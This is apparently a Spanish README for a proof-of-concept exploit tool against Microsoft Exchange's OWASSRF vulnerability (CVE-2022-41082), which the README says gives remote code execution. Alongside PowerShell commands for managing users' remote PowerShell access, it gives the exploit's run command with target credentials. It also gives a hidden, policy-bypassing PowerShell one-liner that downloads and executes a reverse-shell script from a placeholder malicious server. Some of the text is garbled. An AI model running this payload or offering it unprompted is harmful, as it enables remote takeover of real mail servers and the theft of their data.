
.CVE-2022-41082-poc
Este repositorio contiene una herramienta de prueba de concepto (PoC) para explotar la vulnerabilidad OWASSRF (CVE-2022-41082) en servidores Microsoft Exchange. El exploit permite a los atacantes ejecutar comandos arbitrarios en el servidor, comprometiendo potencialmente el sistema.
La herramienta aprovecha una vulnerabilidad OWASSRF para eludir la autenticación y obtener ejecución remota de código (RCE) en un servidor Exchange. Al explotar esta vulnerabilidad, un atacante puede ejecutar comandos como si fuera un usuario autenticado, lo que conlleva graves implicaciones de seguridad.
Al usar esta herramienta, asegúrese de mantener abierta la misma sesión de Exchange Management Shell. Es crucial habilitar el acceso remoto a PowerShell para al menos un usuario después de deshabilitarlo para otros. De lo contrario, podría perder el acceso a Management Shell en todos los servidores Exchange.
Aquí hay algunos comandos útiles de PowerShell para comprobar y gestionar quién tiene acceso:
Para ver qué usuarios tienen acceso remoto a PowerShell y cuáles no, ejecute:
Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $true'
Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $false'
Advertencia: Tenga cuidado de no cerrar la ventana de Exchange Management Shell a menos que agregue al menos un usuario nuevamente.
Puede deshabilitar el acceso a PowerShell para todos los usuarios usando los siguientes comandos:
$user = Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $true'
$user | foreach {Set-User -Identity $_ -RemotePowerShellEnabled $false}
O utilice un solo comando para lograr el mismo resultado:
Get-User -ResultSize Unlimited | Set-User -RemotePowerShellEnabled $false
Para conceder acceso remoto a PowerShell a un usuario específico, ejecute:
Set-User "guest" -RemotePowerShellEnabled $true
Si pierde el acceso a PowerShell para todos los usuarios, puede crear un nuevo usuario de buzón con derechos de administrador. Este nuevo usuario omitirá las políticas aplicadas, lo que le permitirá volver a usar Exchange Management Shell.
pip si es necesario)Para ejecutar la herramienta PoC, use el siguiente comando:
python3 poc.py -H <IP_objetivo> -u <nombre_usuario> -p <contraseña> -c <archivo_comandos>
Reemplace <IP_objetivo>, <nombre_usuario>, <contraseña> y <archivo_comandos> con sus valores específicos.
Puede modificar el comando en su cmd_file para incluir un payload de shell inversa. Por ejemplo:
powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object Net.WebClient).DownloadString('http://your-malicious-server.com/reverse.ps1')"
Este comando descargará y ejecutará un script de PowerShell desde su servidor, proporcionándole una shell inversa.
Para obtener más información sobre la vulnerabilidad OWASSRF y el código de la PoC, visite el siguiente enlace: OWASSRF CVE-2022-41082 PoC y https://www.youtube.com/watch?v=c2DZYP6jc7g